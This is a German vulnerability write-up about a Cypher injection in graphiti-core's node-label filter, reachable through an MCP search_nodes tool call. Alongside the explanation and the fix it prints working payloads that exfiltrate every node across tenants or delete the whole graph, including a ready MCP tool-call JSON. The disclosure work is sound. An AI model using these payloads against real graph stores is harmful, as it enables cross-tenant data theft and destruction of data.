
Cypher-Injection in graphiti-core (getzep/graphiti) über unsanitisierte node_labels — CVSS 8.1
Schweregrad: Hoch (CVSS 8.1)
CWE: CWE-943 — Unzureichende Neutralisierung spezieller Elemente in der Datenabfragelogik
Betroffen: graphiti-core <= 0.28.1 (pip)
Behoben in: 0.28.2
Advisory: GHSA
NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-32247
graphiti-core erstellt Cypher-WHERE-Klauseln, indem benutzergelieferte Node-Label-Strings mit | verbunden und in eine Rohabfrage eingefügt werden. Ein Angreifer kann beliebige Cypher-Operatoren injizieren, Daten aus beliebigen Graph-Knoten über alle Mandanten hinweg exfiltrieren oder den gesamten Graphen löschen — keine Parametrisierung, keine Validierung irgendwo in der Kette.
Ich habe systematisch MCP-Server-Repositories aus der awesome-mcp-servers-Liste gescannt und mich auf Projekte konzentriert, die LLM-Agenten mit einer Datenbank-Backend verbinden. Graphiti stach hervor, weil es als die Speicherschicht für KI-Agenten positioniert ist — ein Ziel mit hohem Wert.
Mein Scan-Muster für Graphdatenbanken ist einfach: grep nach f-Strings, die MATCH, WHERE oder Label-Verkettung enthalten. Die Zeile 'n:' + node_labels in search_filters.py sprang sofort ins Auge — es ist eine rohe String-Verkettung, die direkt in eine Cypher-Abfrage geht. Die Variable stammte aus entity_types im MCP-Tool-Handler ohne jegliche Validierung.
Was dies über eine Standard-Injection hinaus interessant machte: Die WITH-Klausel von Cypher ermöglicht es, aus einem WHERE-Kontext auszubrechen und eine völlig neue Pipeline zu starten. So schließt ) den geklammerten Label-Ausdruck, WITH n wechselt zu einer neuen Klausel, und // verwirft stillschweigend den Rest der ursprünglichen Abfrage. Ein Payload, voller Graph-Zugriff.
Ich habe es in 10 Minuten bestätigt, indem ich die exakte Logik in einem eigenständigen Python-Skript reproduziert habe, verifizierte, dass DETACH DELETE alle Knoten löscht, und schrieb dann den GHSA-Bericht.
Datei: graphiti_core/search/search_filters.py, Zeilen 91–92 und 134–135
# Verwundbarer Code — exakte Kopie aus dem Quellcode
node_labels = '|'.join(filters.node_labels)
node_label_filter = 'n:' + node_labels
# node_label_filter wird dann in eine Cypher-WHERE-Klausel interpoliert
Einstiegspunkt: mcp_server/src/graphiti_mcp_server.py, Zeile 441
search_filters = SearchFilters(
node_labels=entity_types, # Benutzereingabe direkt übergeben, keine Validierung
)
Der Parameter entity_types fließt vom MCP-search_nodes-Toolaufruf direkt in den Query-Builder. Sowohl Neo4j- als auch FalkorDB-Backends sind betroffen. Das Kuzu-Backend ist nicht betroffen, da es parametrisierte Abfragen verwendet.
Der Wert node_label_filter (n:Label1|Label2) wird in eine Cypher-Abfrage eingebettet als:
WHERE (n:Label1|Label2) AND ...
Da Labels mit | verbunden und vom Aufrufer in Klammern gesetzt werden, muss ein Angreifer nur den Ausdruck mit ) schließen und neue Cypher-Klauseln injizieren. Der //-Kommentaroperator unterdrückt den Rest der ursprünglichen Abfrage.
# Exakte Logik aus search_filters.py Zeilen 91-92
def build_filter(node_labels):
labels = '|'.join(node_labels)
return 'n:' + labels
# Harmlos
print(build_filter(["Person", "Organization"]))
# → n:Person|Organization → WHERE (n:Person|Organization) AND ...
# Exfiltration: alle Knoten über alle Gruppen hinweg lesen
print(build_filter(["Entity`) WITH n MATCH (x) RETURN x //"]))
# → n:Entity`) WITH n MATCH (x) RETURN x //
# Vollständiges Cypher: WHERE (n:Entity`) WITH n MATCH (x) RETURN x // AND ...
# Das `) schließt das WHERE, WITH startet eine neue Pipeline, // verwirft den Rest
# Löschung: den gesamten Graphen auslöschen
print(build_filter(["Entity`) WITH n MATCH (x) DETACH DELETE x //"]))
Über MCP-Toolaufruf:
{
"tool": "search_nodes",
"arguments": {
"query": "test",
"entity_types": ["Entity`) WITH n MATCH (x) DETACH DELETE x //"]
}
}
group_id-Namespaces hinweg lesenDETACH DELETE löscht den gesamten Graphengroup_id-Filter wird nach dem injizierbaren Label-Filter angewendet — das Injizieren einer WITH-Klausel umgeht ihn vollständigDie gepatchte Version validiert Node-Labels gegen eine Allowlist alphanumerischer Zeichen vor der Interpolation, und der Volltextsuchpfad verwendet parametrisierte Abfragen für group_id-Werte.